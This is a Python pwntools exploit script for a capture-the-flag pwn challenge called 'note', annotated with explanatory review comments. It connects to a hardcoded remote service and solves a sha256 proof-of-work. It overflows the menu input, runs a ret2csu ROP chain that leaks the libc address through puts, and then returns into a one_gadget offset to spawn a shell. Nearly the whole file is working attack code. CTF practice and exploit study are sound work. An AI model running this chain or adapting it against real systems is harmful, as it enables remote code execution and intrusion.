#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright © 2018 hzshang <[email protected]>
from pwn import *
from pwnlib.util.iters import bruteforce
from parse import *
import string
from hashlib import sha256
# Verbose pwntools logging: every byte sent and received is dumped.  Handy
# while developing the chain, but it also writes the payloads (and the leaked
# libc address) into whatever captures the log -- drop to "info" when done.
context.log_level = "debug"

# Target binary plus the libc it ships with.  The raw addresses used further
# down (0x400FFA, 0x400FE0, 0x400e3f, 0x602100) are only meaningful for a
# non-PIE build at the default 0x400000 base -- assumed here, confirm with
# checksec before reusing the script.
#
# NOTE(review): the script relies on Python 2 string semantics ("a" * n +
# p64(...), hashing a str); under Python 3 those concatenations raise
# TypeError, so run it with python2 or port it.
pwn_file = "./note"
elf = ELF(pwn_file)
libc = ELF("./libc.so.6")

# Filled in later: libc base once leaked, pid of the local process
# (stays 0 when talking to the remote service).
libc_add = 0
pid = 0

# Any command-line argument selects the remote CTF service; no argument
# spawns the binary locally so it can be attached to with a debugger.
if len(sys.argv) != 1:
    conn = remote("47.89.18.224", 10007)
else:
    conn = process(pwn_file)
    pid = conn.pid
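def brute_force(prefix, s):
    """Solve the service's proof-of-work: find the 4-character token ``x``
    such that ``sha256(x + prefix).hexdigest() == s``.

    The search space is ``[A-Za-z0-9]{4}`` (62**4 ~ 14.7M candidates), walked
    in alphabet order with the standard library instead of
    ``pwnlib.util.iters.bruteforce``.  The banner fixes the token length at
    exactly four characters ("xxxx"), so only length-4 candidates are tried
    (the original's default ``method='upto'`` also wasted time on lengths 1-3).

    Args:
        prefix: the server-supplied suffix, ``str`` or ``bytes``.
        s: the expected hex digest as printed by the server; surrounding
            whitespace is ignored.

    Returns:
        The token, of the same type as ``prefix`` (``str`` in -> ``str`` out,
        ``bytes`` in -> ``bytes`` out), or ``None`` if nothing matches --
        which in practice means the banner was parsed incorrectly.
    """
    import itertools

    # hashlib needs bytes; accept both text (Python 3 str) and raw bytes
    # (Python 2 str) and hand back the same kind the caller gave us.
    text_in = not isinstance(prefix, bytes)
    suffix = prefix.encode() if text_in else prefix
    want = s.decode() if isinstance(s, bytes) else s
    want = want.strip()
    # A bytearray iterates as ints on both Python 2 and 3, so the tuple of
    # ints from product() can be turned back into bytes the same way on both.
    alphabet = bytearray((string.ascii_letters + string.digits).encode())
    for combo in itertools.product(alphabet, repeat=4):
        token = bytes(bytearray(combo))
        if sha256(token + suffix).hexdigest() == want:
            return token.decode() if text_in else token
    return None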
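# Proof-of-work handshake.  The first line from the service looks like
# "sha256(xxxx+<prefix>) == <hexdigest>"; reply with the matching token.
data = conn.recvline(keepends=False)
matched = parse("sha256(xxxx+{}) == {}", data)
if matched is None:
    # parse() returns None on a mismatch; fail with the banner in the log
    # instead of an opaque unpack TypeError (log.error raises).
    log.error("unexpected proof-of-work banner: %r" % (data,))
prefix, s = matched
token = brute_force(prefix, s)
if token is None:
    log.error("proof-of-work has no solution for banner %r" % (data,))
conn.sendline(token)
# Fix: the original reset ``pid = 0`` here, discarding the local process pid
# captured at startup so debug() always reported pid 0.  pid is left alone.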
def debug():
    """Dump the current libc base and local pid, then pause for a debugger.

    Reads the module globals ``libc_add`` and ``pid``; intended to be called
    between exploit stages so a debugger can be attached (``gdb -p <pid>``)
    before the run continues.  ``pid`` is 0 for the remote target.
    """
    log.debug("libc address:0x{:x}".format(libc_add))
    log.debug("process pid:{:d}".format(pid))
    pause()
def edit(s):
    """Menu option 1: replace the note body with ``s``.

    Drives the interactive menu on the global ``conn``: picks "1" at the
    "> " prompt, then sends ``s`` after the "Note:" prompt.
    """
    choice = "1"
    conn.sendlineafter("> ", choice)
    conn.sendlineafter("Note:", s)
def show():
    """Menu option 2: print the note and return what the program shows.

    Returns the line following the "Note:" label, without its trailing
    newline.
    """
    choice = "2"
    conn.sendlineafter("> ", choice)
    conn.recvuntil("Note:")
    note_line = conn.recvline(keepends=False)
    return note_line
def save():
    """Menu option 3: persist the note.

    Blocks until the program acknowledges with "Saved!\\n" so the next menu
    interaction starts from a known point in the output.
    """
    choice = "3"
    conn.sendlineafter("> ", choice)
    conn.recvuntil("Saved!\n")
def changeID(s):
    """Menu option 4: set the note's ID to ``s``.

    Sends ``s`` once the program asks "Input your ID:".
    """
    choice = "4"
    conn.sendlineafter("> ", choice)
    conn.sendlineafter("Input your ID:", s)
def exit():
    """Menu option 5: ask the target program to quit.

    NOTE: this shadows the builtin ``exit`` for the rest of the script -- a
    later ``exit()`` meant to end the Python process would instead send "5"
    to the target.  Kept under this name because the rest of the file may
    refer to it.
    """
    choice = "5"
    conn.sendlineafter("> ", choice)
# Initial ID: a NUL-terminated "a" at offset 0 and "%s\0" at offset 0xc0,
# with "a" filler in between (fit() lays the pieces out at those offsets).
# NOTE(review): what the 0xc0 slot feeds is not visible from this script;
# the "%s" suggests it lands in a format string the program later passes
# to printf-style output -- confirm in the binary before relying on it.
ID = {
    0: "a\x00",
    0xc0: "%s\x00",
}
id_payload = fit(ID, filler="a")
conn.sendlineafter("Input your ID:", id_payload)
# Note body: 0x100 bytes of filler with one 8-byte value at offset 0xa8
# pointing at 0x602100.  ``f`` is reused for the second stage below.
# NOTE(review): 0x602100 sits where a non-PIE binary's writable data
# normally lives, but which field of the note lives at 0xa8 and why it is
# redirected there is not visible from this script -- check the binary.
f = {
    0xa8: p64(0x602100),
}
note_payload = fit(f, length=0x100)
edit(note_payload)
# Stage 1 -- leak libc with a ret2csu call to puts(&got.puts).
# The menu read at the "> " prompt overflows after 0x64 bytes of filler and
# the chain lands on the two __libc_csu_init gadgets of this non-PIE binary:
#   0x400FFA  pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
#   0x400FE0  the "call [r12 + rbx*8]" gadget that loads rdi/rsi/rdx from
#             the popped registers (which register feeds edi varies between
#             toolchains -- both r12 and r15 hold got.puts here, verify in
#             the disassembly that rdi ends up as &got.puts)
# rbx=0 selects got.puts itself, rbp=1 makes the post-call "cmp rbx, rbp"
# fall through; the gadget then does add rsp,8 and pops rbx..r15 (the seven
# zero qwords) and returns into _start, restarting the program with libc
# now known.  The trailing "," is presumably the delimiter the menu parser
# stops at -- not visible here.
csu_pop = 0x0400FFA
csu_call = 0x400FE0
entry = 0x400e3f
chain = [
    csu_pop,
    0,                  # rbx
    1,                  # rbp
    elf.got["puts"],    # r12
    0,                  # r13
    0,                  # r14
    elf.got["puts"],    # r15
    csu_call,
    0, 0, 0, 0, 0, 0, 0,  # add rsp,8 + pop rbx..r15 after the call
    entry,              # jmp to _start
]
rop = "a" * 0x64 + "".join(p64(q) for q in chain) + ","
conn.sendlineafter("> ", rop)

# puts() writes the GOT entry up to its first NUL (6 significant bytes of a
# 0x7f... address) followed by "\n".
# NOTE(review): recvline() keeps that trailing "\n"; if the leak line is
# exactly the address bytes plus newline, the newline becomes byte 6 of the
# u64 and libc_add is off by 0x0a << 48.  recvline(keepends=False) or
# .strip() would be the safe form -- left unchanged here, confirm against
# the program's real output.
leak = conn.recvline()
libc_add = u64(leak.ljust(8, "\x00")) - libc.symbols["puts"]
# Stage 2 -- the program restarted from _start, so redo the setup (any ID,
# the same 0xa8 -> 0x602100 note) and overflow the menu read again, this
# time returning straight into libc.
# NOTE(review): libc_add + 0x4526a is presumably a one_gadget-style
# execve("/bin/sh") offset for the bundled libc.so.6 -- re-derive it with
# `one_gadget ./libc.so.6` if the libc ever changes.  The 0x40 bytes of NULs
# behind it look intended to satisfy that gadget's "stack slot == NULL"
# constraint; confirm both against the actual libc.
conn.sendlineafter("Input your ID:", "a")
edit(fit(f, length=0x100))
one_gadget = libc_add + 0x4526a
payload = "a" * 0x64 + p64(one_gadget) + "\x00" * 0x40 + ","
conn.sendlineafter("> ", payload)
conn.interactive()